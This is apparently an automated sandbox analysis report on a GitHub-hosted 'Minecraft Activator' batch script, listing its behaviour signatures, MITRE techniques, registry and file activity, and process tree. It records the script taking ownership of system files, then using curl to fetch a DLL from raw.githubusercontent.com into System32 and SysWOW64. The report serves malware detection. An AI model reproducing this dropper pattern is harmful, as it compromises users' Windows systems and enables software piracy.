hxxps://github[.]com/shivu-cmd/minecraftbedrockpc/blob/main/Minecraft%20Activator%20By%20Shivansh%20Chauhan[.]cmd

Analysis

max time kernel
187s
max time network
187s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
01/04/2025, 10:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/shivu-cmd/minecraftbedrockpc/blob/main/Minecraft%20Activator%20By%20Shivansh%20Chauhan.cmd

Score

8^/10

microsoft discovery execution exploit phishing

Malware Config

Signatures

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
2976	icacls.exe
2684	takeown.exe
4896	icacls.exe
2816	takeown.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2976	icacls.exe
2684	takeown.exe
4896	icacls.exe
2816	takeown.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
25	raw.githubusercontent.com

Detected potential entity reuse from brand MICROSOFT. 1 IoCs

phishing microsoft

flow	pid	Process
329	3316	msedge.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\windows.applicationmodel.store.dll	curl.exe
File created	C:\Windows\SysWOW64\windows.applicationmodel.store.dll	curl.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ja\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ta\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\si\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\hi\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ru\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\az\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\uk\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\cs\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\gl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ur\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\dasherSettingSchema.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ko\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\eu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\it\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\no\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\th\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\en_GB\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\iw\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ml\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\pt_PT\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\hu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\am\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\zh_CN\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ms\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\sk\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\is\messages.json	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\sr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\lt\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\be\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\fr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\mr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\de\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\kk\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\sw\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\gu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\es_419\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\da\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\lo\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\sv\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ar\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\hr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\service_worker_bin_prod.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\offscreendocument_main.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\offscreendocument.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\zh_TW\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\zh_HK\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\vi\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\hy\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\my\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\ro\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\pa\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\128.png	msedge.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\msedge_url_fetcher_3572_695811263\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\bg\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\et\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\fil\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\id\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\en_CA\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\pl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\af\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3572_2073768388\_locales\nl\messages.json	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2092	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	msedge.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	msedge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	msedge.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	msedge.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879771940555197"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2873637269-1458872900-2373203793-1000\{81400170-C532-41A9-AFEB-CF4FF6D84735}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Minecraft Activator By Shivansh Chauhan.cmd:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
2092	powershell.exe
2092	powershell.exe
5808	chrome.exe
5808	chrome.exe
1808	chrome.exe
1808	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe
3572	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5808 wrote to memory of 4536	5808	chrome.exe	78
PID 5808 wrote to memory of 4536	5808	chrome.exe	78
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 5480	5808	chrome.exe	79
PID 5808 wrote to memory of 2064	5808	chrome.exe	80
PID 5808 wrote to memory of 2064	5808	chrome.exe	80
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82
PID 5808 wrote to memory of 1992	5808	chrome.exe	82

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/shivu-cmd/minecraftbedrockpc/blob/main/Minecraft%20Activator%20By%20Shivansh%20Chauhan.cmd
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd82dfdcf8,0x7ffd82dfdd04,0x7ffd82dfdd10
  2⤵
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1932 /prefetch:2
  2⤵
  PID:5480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2228,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1432 /prefetch:11
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2436 /prefetch:13
  2⤵
  PID:1992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4188 /prefetch:9
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5116,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5136 /prefetch:14
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,16740203501699515600,133620815836900295,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5168 /prefetch:14
  2⤵
  - NTFS ADS
  PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Minecraft Activator By Shivansh Chauhan.cmd" "
  2⤵
  PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c PowerShell -Command "(New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)"
    3⤵
    PID:6104
